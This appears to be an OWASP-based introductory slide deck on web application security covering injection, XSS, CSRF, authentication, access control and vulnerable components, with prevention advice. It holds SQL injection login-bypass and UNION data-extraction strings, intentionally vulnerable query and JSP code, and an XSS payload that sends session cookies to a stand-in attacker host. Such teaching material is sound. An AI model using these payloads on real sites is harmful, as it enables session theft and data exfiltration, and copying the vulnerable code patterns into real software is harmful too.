Web Application Security
in a nutshell
An ultra-compact intro (or refresher) to Web Application Security
Created by Björn Kimminich / @bkimminich
Famous last words...
“Nobody would bother to hack us.”
“Our Firewall, IDS and IPS will keep us safe.”
“We will add security to the system later.”
“What's the worst that could actually happen?”
Injection means...
...tricking an application into including unintended commands in the data sent to an interpreter.
Interpreter means...
...a program that takes a String and interprets it as a command.
Interpreters are used for...
- SQL
- HQL
- OS Shell
- LDAP
- XPath
- ...
Bypassing Authentication
with SQL Injection
String query = "SELECT id FROM users " +
"WHERE name = '" + req.getParameter("username") + "'" +
"AND password = '" + req.getParameter("password") + "'";
The indented use case results in a query like this:
SELECT id FROM users WHERE name = 'bjoern' AND password = 'secret'
Attack Examples
on authentication queries
Disabling password check for a known username:
SELECT id FROM users WHERE name = 'bjoern'--' AND password = '?'
Logging in without even knowing a username:
SELECT id FROM users WHERE name = '' or 1=1--' AND password = '?'
Spying out Data
with SQL Injection
String query =
"SELECT id,author,title,price FROM books " +
"WHERE title LIKE '%" + req.getParameter("query") + "%'";
The indented use case results in a query like this:
SELECT id,author,title,price FROM books WHERE title LIKE '%tangled web%'
Attack Examples
on data retrieval queries
Probing for right number of result set columns:
SELECT [...] WHERE title LIKE '%' UNION SELECT null FROM users--%'
SELECT [...] WHERE title LIKE '%' UNION SELECT null,null FROM users--%'
SELECT [...] WHERE title LIKE '%' UNION SELECT null,null,null FROM users--%'
Using known column names to extract data:
SELECT [...] WHERE title LIKE '%' UNION SELECT name,password,email FROM users--%'
Preventing Injection
- Avoid Interpreters
- Bind Variables
- Prepared Statements
- Least Privileges for app DB user
- White List Input Validation
Cross Site Scripting (XSS)
Malicious Code is sent...
...to an innocent user's browser through
- a form field or URL (Reflected XSS)
- a previously stored DB record (Persistent XSS)
- a DOM element of a rich JS client (Local XSS)
Possible Damage from XSS
- stolen user session
- stolen sensitive data
- rewriting web page
- redirecting to malicious site
XSS Vulnerability Example
http://bookwo.rm/titles/search?keywords=raspberry%20pi
The indented use case is to display the keywords above the results:
<%
String keywords = request.getParameter("keywords");
List<Book> results = titleSearchService.findByKeywords(keywords.split(" "));
%>
There are <%=results.count()%> results for your search by <em><%=keywords%></em>
<table>
<% for (Book book : results) { %>
// render result as table rows
<% } %>
</table>
XSS Attack Examples
Probing for XSS Vulnerability
<script>alert(1)</script>
Stealing User Session
<script>
new Image().src="http://my.evil-si.te/hijack.php?c="+encodeURI(document.cookie);
</script>
Site Defacement
<script>document.body.background="http://my.evil-si.te/image.jpg";</script>
Preventing XSS
- Do not unnecessarily include user supplied input into output
- Output encode all user supplied input
- Sanitize HTML where user supplied HTML is unavoidable
- White List Input Validation
Cross Site Request Forgery (CSRF)
A Victim's Browser...
...is tricked into issuing a command to a vulnerable webapp. This is caused by browsers automatically including user authentication data with each request.
- Session Cookie
- Basic Authentication
-
Authorization HTTP Header
- ...
Preventing CSRF
- Add a secret token to all sensitive requests
- This token must not be automatically submitted
- Require secondary authentication for sensitive functions
- Beware exposing the token in a Referer HTTP header
Make sure your application has no XSS holes that could be exploited to attack others!
Typical Authentication Flaws
- Allowing weak passwords
- Storing SSL certificate insecurely
- Credentials passed via insecure http connection
- Expose session id's in URLs, via unencrypted network, logs, ...
Side Channel Attack Vectors
- Change Password
- “Remember me”
- Forgot Password
- Secret Questions
Classical Broken Authentication...
...due to starting login process on unencrypted page
http://sick-cure-ba.nk/login.do
POST /login.do HTTP/1.1
Host: sick-cure-ba.nk
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
username=bjoern&password=secret
Weak hashes put passwords at risk...
...as do unsalted strong hash algorithms
id
username
password
1
admin
d033e22ae348aeb5660fc2140aec35850c4da997
2
bjoern
2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b
3
localhorst
0f59bd4122f0c02002ec578e4eec306ed48ff2ad0105a307a6dc98c0e9a54fe4
64e5f807236edce12134067a0b6690891e82490b2b9fa7b4171db43ee8cb4006
Cracking unsalted hashes with a Rainbow Table attack is fast, even though the last two of them might seem sufficiently secure given their 256 and 512bit length.
You can even crack password hashes online, e.g. at CrackStation or via a tweet to @PlzCrack.
Securing Authentication
- Centralized and standardize authentication
- Protect credentials with SSL/TLS
- Use strong authentication mechanism (with multiple factors)
- Do not store or log unencrypted credentials
Common Authorization Mistakes
- Hiding object references instead of restricting access
- Displaying only authorized links and menu choices
- Trusting client-side access control mechanisms
- Lack of server-side verification of user privileges
Request Tampering for Privilege Escalation...
...and finding all kinds of Access Control Issues
http://logistics-worldwi.de/showShipment?id=40643108
http://my-universi.ty/api/students/6503/exams/view
http://document-warehou.se/landingpage?content=index.html
Securing Access Control
- Never rely on “Security by obscurity”
- Replace direct object references with temporary mappings
- Restrict data and functionality access to authorized users
- Enforce user or role based permissions
Possible Environmental Vulnerabilities
- Software Libraries
- Application Server
- Web Server
- Operating System
- ...
Known Vulnerability Examples
Component
Vulnerability
Affected
OpenSSL
Obtain sensitive information from process memory via crafted packets that trigger a buffer over-read (Heartbleed)
1.0.1 - 1.0.1f, 1.0.2-beta, 1.0.2-beta1
Unix Bash
Execution of arbitrary commands on vulnerable Bash, potentially compromising the entire system (Shellshock)
CGI, OpenSSH, DHCP, QMail, ...
Struts
Remote manipulation of the ClassLoader via the class parameter, which is passed to the getClass() method
before 2.3.16.1
Struts
Wildcard cookiesName not properly restricts access to the getClass() method, which allows ClassLoader manipulation
before 2.3.16.2
Protection from Environmental Vulnerabilities
- Monitor security of used components
- Keep up with patches for used components
- Remove unnecessary stuff on all levels
- Restrict use of unapproved components
Java and .NET project dependencies can be monitored by OWASP Dependency Check which
relies on the NIST National Vulnerability Database. For Javascript and Node.js modules there is
Retire.js which is updated manually via its GitHub project.
Both tools integrate well with typical software build processes.
Credits
Presentation created with reveal.js
The HTML Presentation Framework
Based on free material provided by OWASP
The Open Web Application Security Project
Background image based on Digital Shodan by sephiroth-kmfdm
THE END
by Björn Kimminich / kimminich.de
These slides are publicly available on GitHub and Slideshare.